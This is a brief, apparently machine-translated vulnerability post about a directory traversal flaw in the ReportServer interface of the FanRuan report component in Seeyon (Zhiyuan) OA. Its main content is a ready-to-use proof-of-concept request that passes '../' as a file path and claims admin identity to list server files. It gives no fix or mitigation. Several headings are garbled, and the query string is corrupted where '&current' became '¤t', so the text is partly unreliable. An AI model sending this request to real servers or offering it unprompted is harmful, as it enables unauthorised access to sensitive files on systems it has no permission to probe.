Zhiyuan Oa Fansoft Component Reportserver Directory Traversal Vulnerability
Zhiyuan Oa Fansoft Component Reportserver Directory Traversal Vulnerability
Zhiyuan OA Fansoft Component ReportServer Directory Traversal Vulnerability
Vulnerability Description
Zhiyuan OA Fansoft Components The ReportServer interface has a directory traversal vulnerability, and attackers can obtain server sensitive information through the vulnerability.
Vulnerability Impact
Zhiyuan OA Sailing Component
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
/seeyonreport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=../¤tUserName=admin¤tUserId=1&isWebReport=true
This post is licensed under CC BY 4.0 by the author.